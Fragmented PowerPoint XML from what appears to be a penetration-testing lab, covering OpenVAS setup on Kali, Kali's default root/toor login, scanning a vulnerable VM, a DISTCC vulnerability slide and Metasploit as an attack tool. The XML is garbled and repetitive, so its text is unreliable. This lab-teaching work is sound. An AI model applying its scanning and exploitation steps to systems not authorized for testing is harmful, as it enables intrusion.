            <a:ext cx="5807808" cy="40811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56" y="3106102"/>
            <a:ext cx="494488" cy="4944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27" y="4365912"/>
            <a:ext cx="494488" cy="4944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941168"/>
            <a:ext cx="494488" cy="49448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14825" y="1880873"/>
            <a:ext cx="790790" cy="3708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LAN</a:t>
            </a:r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231" y="3944560"/>
            <a:ext cx="465584" cy="4655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930734" y="4831496"/>
            <a:ext cx="20924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Target Alice</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4001919" y="2733352"/>
            <a:ext cx="790790" cy="3708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Eve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018656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867" y="3042875"/>
            <a:ext cx="735451" cy="73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1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 to Red (with user)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925921"/>
            <a:ext cx="7543800" cy="4023359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391" y="1868117"/>
            <a:ext cx="5807808" cy="40811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56" y="3106102"/>
            <a:ext cx="494488" cy="4944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27" y="4365912"/>
            <a:ext cx="494488" cy="4944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941168"/>
            <a:ext cx="494488" cy="49448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14825" y="1880873"/>
            <a:ext cx="790790" cy="3708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LAN</a:t>
            </a:r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231" y="3944560"/>
            <a:ext cx="465584" cy="4655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930734" y="4831496"/>
            <a:ext cx="20924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Target Alice</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4001919" y="2733352"/>
            <a:ext cx="790790" cy="3708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Eve</a:t>
            </a:r>
            <a:endParaRPr lang="he-I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867" y="3042875"/>
            <a:ext cx="735451" cy="7354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51" y="3188081"/>
            <a:ext cx="494488" cy="49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OpenVAS –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Vulnerability scanning is a crucial phase of a penetration testing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Having an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>updated vulnerability scanner can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>often make a real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>difference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by helping you discover vulnerable items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open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>vulnerability assessment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system (a.k.a. OpenVAS) is a framework offering a comprehensive and powerful vulnerability scanning and vulnerability management solutions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security scanner is regularly updated with new network vulnerabilities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OpenVAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a free software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630" t="7974" r="3735" b="27964"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052427" y="2319945"/>
            <a:ext cx="2925345" cy="3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7709480" cy="40233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Before we can start performing this lab you should run the KALI virtual machine (under D:\Virtual Machines)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Username: root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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toor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r="21438"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419872" y="3284984"/>
            <a:ext cx="3575248" cy="2447361"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322455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7709480" cy="40233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Before we can start performing this lab you should run the KALI virtual machine (under D:\Virtual Machines)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Username: root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Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toor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r="21438"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419872" y="3284984"/>
            <a:ext cx="3575248" cy="2447361"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82525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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> necessary services you should execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>follows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Please </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>alidate that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OpenVAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>manager, scanner, and GSAD services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i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order to start using OpenVAS you should first create a user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do so, type the following command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630" t="7974" r="3735" b="27964"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052427" y="2319945"/>
            <a:ext cx="2925345" cy="30753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7504" y="2852936"/>
            <a:ext cx="4872915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dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-start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7504" y="5674064"/>
            <a:ext cx="4872915" cy="563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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openvasmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --create-user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;user-name&gt;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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> necessary services you should execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>installation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>follows: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Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Terminal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Do you want to continue? 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Afterwards:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i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Downloading the vulnerabilities by year and install.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630" t="7974" r="3735" b="27964"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052427" y="2319945"/>
            <a:ext cx="2925345" cy="30753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577" y="2996952"/>
            <a:ext cx="4872915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dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas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577" y="3781632"/>
            <a:ext cx="4872915" cy="563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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-setup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23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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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7543800" cy="40233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When it finished you should see in the terminal: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85" y="2328053"/>
            <a:ext cx="6079359" cy="40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9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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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7543800" cy="40233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 Mozilla browser will open automatically.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57" y="2328053"/>
            <a:ext cx="7414303" cy="375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2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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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7543800" cy="40233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 Mozilla browser will open automatically.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33" y="1822503"/>
            <a:ext cx="6511698" cy="44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7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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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7543800" cy="40233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Click on “Add Exception” button.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Click on “Confirm Security Exception”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 result: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212976"/>
            <a:ext cx="6247349" cy="346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9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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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7543800" cy="40233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Username: admin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Password: copy from the terminal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212976"/>
            <a:ext cx="6247349" cy="346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2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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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7543800" cy="40233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64978"/>
            <a:ext cx="8466653" cy="38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doing so, point your browser to https://127.0.0.1:9392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Enter the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>credentials for the user you created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8" r="4326" b="9888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="4915076"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="1772816"/>
            <a:ext cx="648072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308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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> necessary services you should execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>follows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Please </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>alidate that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OpenVAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>manager, scanner, and GSAD services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i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order to start using OpenVAS you should first create a user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do so, type the following command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630" t="7974" r="3735" b="27964"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052427" y="2319945"/>
            <a:ext cx="2925345" cy="30753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7504" y="2852936"/>
            <a:ext cx="4872915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dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-start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7504" y="5674064"/>
            <a:ext cx="4872915" cy="563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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openvasmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --create-user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;user-name&gt;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18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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> necessary services you should execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>follows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Please </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>alidate that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OpenVAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>manager, scanner, and GSAD services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i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order to start using OpenVAS you should first create a user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do so, type the following command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630" t="7974" r="3735" b="27964"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052427" y="2319945"/>
            <a:ext cx="2925345" cy="30753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7504" y="2852936"/>
            <a:ext cx="4872915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dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-start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7504" y="5674064"/>
            <a:ext cx="4872915" cy="563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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openvasmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --create-user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;user-name&gt;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66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OpenVAS – Quick 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4824"/>
            <a:ext cx="3703320" cy="40233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can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>immediately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scan a target  IP by entering its IP address into the quick start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>text-box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short-cut will do the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with default Port List</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> using this target with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Scan Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start this scan task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>right away</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Switch the view to reload every 30 seconds so you can lean back and watch the scan progress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2" name="Picture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1" t="23699" r="6045" b="17354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664075" y="2246454"/>
            <a:ext cx="3702050" cy="32223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664075" y="5016781"/>
            <a:ext cx="3220293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4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OpenVAS – Quick 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4824"/>
            <a:ext cx="3703320" cy="40233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Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start scanning the entire network, figure out what is the IP of the Multipliable VM using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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Note that the target machine should be reachable to the Kali VM (you should put them on the same virtual network)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Q1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which of the ports of the target machine are open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2" name="Picture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1" t="23699" r="6045" b="17354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664075" y="2246454"/>
            <a:ext cx="3702050" cy="32223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664075" y="5016781"/>
            <a:ext cx="3220293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6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198328"/>
            <a:ext cx="7589520" cy="822960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the status-bar for revealing the scan details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Placeholder 10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72" r="172"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5640" y="-27384"/>
            <a:ext cx="9149640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5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198328"/>
            <a:ext cx="7589520" cy="822960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>found on the vulnerable machine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9" name="Picture Placeholder 2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3533" b="13533"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1268760"/>
            <a:ext cx="914400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2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198328"/>
            <a:ext cx="7589520" cy="822960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DISTCC vulnerability details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4023" b="4023"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="35497" y="0"/>
            <a:ext cx="9073007" cy="4869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665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exploit the DISTCC vulnerability?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4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to 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925921"/>
            <a:ext cx="7543800" cy="4023359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82" y="2414161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802" y="1903381"/>
            <a:ext cx="3390300" cy="238237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39752" y="4282239"/>
            <a:ext cx="2160240" cy="1648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DMZ</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2920327">
            <a:off x="1671950" y="3547888"/>
            <a:ext cx="805536" cy="489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Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7882868">
            <a:off x="4475121" y="3706041"/>
            <a:ext cx="805536" cy="489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708" y="2492896"/>
            <a:ext cx="494488" cy="4944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615" y="3039848"/>
            <a:ext cx="494488" cy="4944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433" y="3287092"/>
            <a:ext cx="494488" cy="4944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410" y="4792840"/>
            <a:ext cx="91440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376215" y="4445537"/>
            <a:ext cx="790790" cy="3708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Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Right Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19348191">
            <a:off x="4520257" y="4548790"/>
            <a:ext cx="1512725" cy="460767"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902405" y="3819339"/>
            <a:ext cx="790790" cy="3708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WAN</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519825" y="1774324"/>
            <a:ext cx="790790" cy="3708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LAN</a:t>
            </a:r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519" y="2618496"/>
            <a:ext cx="465584" cy="4655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65022" y="3505432"/>
            <a:ext cx="20924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Target Alice</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1984593"/>
            <a:ext cx="790790" cy="3708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Eve</a:t>
            </a:r>
            <a:endParaRPr lang="he-I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7" y="2435754"/>
            <a:ext cx="735451" cy="73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6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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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7543800" cy="40233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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is used for two things: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smtClean="0"/>
              <a:t>Initial Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Penetration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err="1" smtClean="0"/>
              <a:t>Weaponization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– of the attacker.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 err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> provides a payload usually when we succeeded to infiltrate. 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In most of the cases, with high privileges.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These privileges will assist to move the weapons to the attacked user.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884189"/>
            <a:ext cx="3561795" cy="18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5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payload?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7543800" cy="4023359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988840"/>
            <a:ext cx="4396483" cy="426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2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OpenVAS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting Stated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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> necessary services you should execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>installation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>follows: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Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Terminal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Do you want to continue? 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Afterwards:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i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Downloading the vulnerabilities by year and install.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630" t="7974" r="3735" b="27964"/>
